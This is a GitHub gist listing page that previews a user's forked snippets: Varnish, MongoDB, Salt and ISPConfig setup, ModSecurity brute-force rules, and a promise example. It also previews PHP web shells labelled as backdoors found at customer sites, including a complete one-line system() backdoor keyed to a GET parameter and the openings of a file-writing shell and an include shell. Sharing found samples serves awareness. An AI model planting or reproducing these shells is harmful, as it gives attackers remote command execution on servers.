(╯°□°)╯︵ uᴉǝssnH ɐɟɐʇsoW mostafahussein
💀
mostafahussein
/ default.vcl
Created
November 29, 2015 08:57
— forked from reifman/default.vcl
Example Varnish VCL Configuration e.g. /etc/varnish/default.vcl
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Default backend definition. Set this to point to your content server. | |
| backend default { | |
| .host = "127.0.0.1"; | |
| .port = "8080"; | |
| .connect_timeout = 60s; | |
| .first_byte_timeout = 60s; | |
| .between_bytes_timeout = 60s; | |
| .max_connections = 800; | |
| } |
mostafahussein
/ Iicense.php
Created
December 12, 2015 14:24
— forked from jonaslejon/Iicense.php
Magic Include Shell PHP Backdoor found at customer site
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| error_reporting(0); | |
| $ver = '6.6.6'; | |
| $my_keyw = $_SERVER['HTTP_USER_AGENT']; | |
| $items_per_page = 50; | |
| $admin_name = '27a0e2015f9087981c0b95a29fc4ba57'; | |
| $admin_pass = '9413c48772f73d5c305b65eb58a06f9c'; | |
| if($my_keyw=='spaumbot') |
mostafahussein
/ .cache.php
Created
December 12, 2015 15:10
— forked from jonaslejon/.cache.php
Backdoor found at customer site
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if (substr(md5($_GET["localdate"]),0,6) == "6fbcb8") { | |
| $time = str_replace("@"," ",$_GET["localtime"]); | |
| @system($time); exit; | |
| } | |
| ?> |
mostafahussein
/ else.php
Created
December 19, 2015 06:40
— forked from smottt/else.php
Vulnerability scan file
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $content = stripslashes($_POST['content']); | |
| $cfile = $_POST['cfile']; | |
| $ufile = $_POST['ufile']; | |
| echo '<b><br>'.php_uname().'<br></b>'; | |
| echo '<form action="" method="post" enctype="multipart/form-data" name="aw" id="aw">'; | |
| echo '<textarea name=content style="width:585px;height:200px">'.$content.'</textarea><br>'; | |
| echo '<input type="text" name="cfile" size="10" value="newfile.php">'; |
mostafahussein
/ gist:3211b8b3166667f3cbd8
Created
December 24, 2015 06:22
— forked from tamoyal/gist:10441108
Create super user and database user in Mongo 2.6
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Create your superuser | |
| $ mongo | |
| > use admin | |
| > db.createUser({user:"someadmin",pwd:"secret", roles:[{role:"root",db:"admin"}]}) | |
| > exit | |
| # Alias for convenience (optional and at your own risk) | |
| $ echo 'alias mongo="mongo --port 27017 -u someadmin -p secret --authenticationDatabase admin"' >> ~/.bash_profile | |
| $ source ~/.bash_profile |
mostafahussein
/ custom_module.py
Created
December 29, 2015 16:52
— forked from UtahDave/custom_module.py
Fire and Forget Salt module
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from subprocess import Popen | |
| def start_server(): | |
| cmd_str = 'sleep 60 && echo "hello!" >> /tmp/test.txt' | |
| proc = Popen([cmd_str], shell=True, | |
| stdin=None, stdout=None, stderr=None, close_fds=True) | |
| return cmd_str |
mostafahussein
/ nginx-ispconfig3-ubuntu.sh
Created
December 30, 2015 13:13
Install Nginx ISPConfig3 Ubuntu 14.04 64Bits
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| ## Install ISPConfig3 on Ubuntu 14.04 64Bits | |
| ## Author: Nilton OS blog.linuxpro.com.br | |
| ## http://blog.linuxpro.com.br/posts/instalando-ispconfig3-no-ubuntu-1404.html | |
| ## http://www.howtoforge.com/the-perfect-server-ubuntu-14.04-nginx-bind-mysql-php-postfix-dovecot-and-ispconfig3-p2 | |
| dpkg-reconfigure dash | |
| service apparmor stop |
mostafahussein
/ testChainedPromise.js
Created
January 7, 2016 18:34
— forked from calendee/testChainedPromise.js
A simple example of chained promises using Q promise library.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var Q = require("q"); | |
| var slowFunction1 = function( myObject ) { | |
| console.log("\nRunning slowFunction1"); | |
| console.log(myObject); | |
| var deferred = Q.defer(); | |
| setTimeout( function() { |
mostafahussein
/ xmlrpc-distributed-brute-defense.conf
Created
February 11, 2016 16:55
— forked from alzabo/xmlrpc-distributed-brute-defense.conf
WP/xmlrpc brute force ModSecurity rules
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # These rules are designed to be effective versus /distributed/ brute force | |
| # attacks. While they will function just as well against attacks which are | |
| # /not distributed/ they will deny access to all XML-RPC method calls | |
| # namespaced with the prefix "wp." | |
| # | |
| # An IP-based version of these rules may be more appropriate for sites which | |
| # attacked from just a few distinct IP addresses. | |
| # | |
| # See http://alzabo.io/modsecurity/2014/09/15/wordpress-xml-rpc-brute-force.html | |
| # for additional information |
mostafahussein
/ CityFan repo RHEL 6
Created
February 29, 2016 20:13
— forked from yograterol/ CityFan repo RHEL 6
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| rpm -Uvh http://www.city-fan.org/ftp/contrib/yum-repo/city-fan.org-release-1-12.rhel6.noarch.rpm |